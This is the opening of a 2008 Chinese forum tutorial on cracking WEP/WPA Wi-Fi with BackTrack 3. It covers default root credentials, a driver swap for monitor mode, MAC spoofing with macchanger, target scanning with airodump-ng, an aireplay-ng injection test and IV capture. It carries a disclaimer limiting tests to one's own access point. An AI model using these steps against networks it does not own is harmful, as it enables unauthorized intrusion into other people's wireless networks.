中国无线论坛中卫出品
Anywhere WLAN!! 1
BT3破解无线 WEP/WPA教程
中国无线论坛中卫出品
Anywhere WLAN!! 2
声明:任何不经别人同意而进入别人网络都是非法和不道德的行为。
本教程用于学习和交流,如要实验请拿自已的 AP 开刀!!
题记:
本人是中国无线论坛 http://www.wlanbbs.com/的 ID“中卫”,
无线安全版块是本论坛一个特殊而重要的版块,我们一直非常努
力的想把这个板块做好。作为板块现阶段的的一个重点就是无线 WEP
和 WPA 的破解内容。我根据各位坛友的教程和自己的理解整理编辑成
这篇《BT3 破解无线 WEP/WPA 教程》。
由于本人也是初学者,缺乏专业的理论知识,因此文中不免存在理
解的偏差甚至错误,希望各位朋友指正。
最后希望更多的朋友参与到教程的整理和编辑中,不断把教程修
正和完善。
如果对教程有任何意见和建议,欢迎各位到 www.wlanbbs.com 论
坛提问和交流。
谢谢!!
中卫
08 年 7 月 13 日
中国无线论坛中卫出品
Anywhere WLAN!! 3
开放式 WEP 破解
1.装备: IMBX60 笔记本(内置 Intel3945 无线网卡)、 BT3 的 U 盘系统(需用 syslinux 命令来指定启动
BT3 的盘符)
2.用户名:root 密码:toor,进入图形界面:startx。启动 BT3 后,(启动黑屏:xconf 再输入 startx)
3.加载 3945 网卡的驱动。打开一个 shell
输入 modprobe –r iwl3945 卸载原来的网卡驱动
输入 modprobe ipwraw 加载可监听的网卡驱动
注:不同的网卡有不同的加载方式
LINUX 驱动是通过模块进行加载的,可以用 lsmod 来查看机器已加载的模块
然后可以通过 modinfo ipwraw(模块名)来查看所加载驱动模块的版本信息
最新的 ipwraw 的版本是 ipwraw-ng-2.3.4-04022008.tar.bz2 的。
中国无线论坛中卫出品
Anywhere WLAN!! 4
最新的版本需要设置 rate 为 1M 设置命令为 iwconfig wifi0 rate 1M
这个版本的驱动支持 3945 无线网卡发射功率得设置,命令如下
iwconfig wifi0 txpower 16(TXPOWER 是你想设置的值 min=-12 and max=16,单位为 dBm)
参数 on/off 可以打开和关闭发射单元,auto 和 fixed 指定无线是否自动选择发射功率。
注:降低连接速率可提高建立虚拟连接的成功率和稳定性,提高发射功率可增加发射距离。
4. 查找目标:
可以用 airodump-ng wifi0 来搜索
注:通过扫描获得你要破解的 AP 的 MAC 和 SSID 还有是否有客户端等信息。记录下这些信息后,请关闭
此窗口。不然会出现后面建立虚拟连接时信道一直在跳转的情况。
我们选择第一个作为目标,channel 为 11(上图中的 CH 代表信道)。
注 : 修改自己网卡的 MAC 地址的命令。
输入 macchanger –m 00:11:22:33:44:55 wifi0
5.激活网卡的 Monitor 模式并工作在 11 信道。(加载网卡,激活监听模式,工作在 11 信道)
输入 airmon-ng start wifi0 11 也可用 iwconfi wifi0 来查看网卡的工作模式和工作信道。
中国无线论坛中卫出品
Anywhere WLAN!! 5
可用 aireplay-ng -9 wifi0 测试注入
6.输入截取数据包命令(截取 11 信道的 ivs 数据包,并保存名为 name.ivs)
输入命令 airodump-ng --ivs -w name -c 11 wifi0 ,
(--ivs:仅截取 ivs 数据包,-w:写入文件,-c:截取 ivs 的信道)
(其中 name 是获取的 ivs 的保存文件的名字,11 是 channel 值,你根据实际修改)
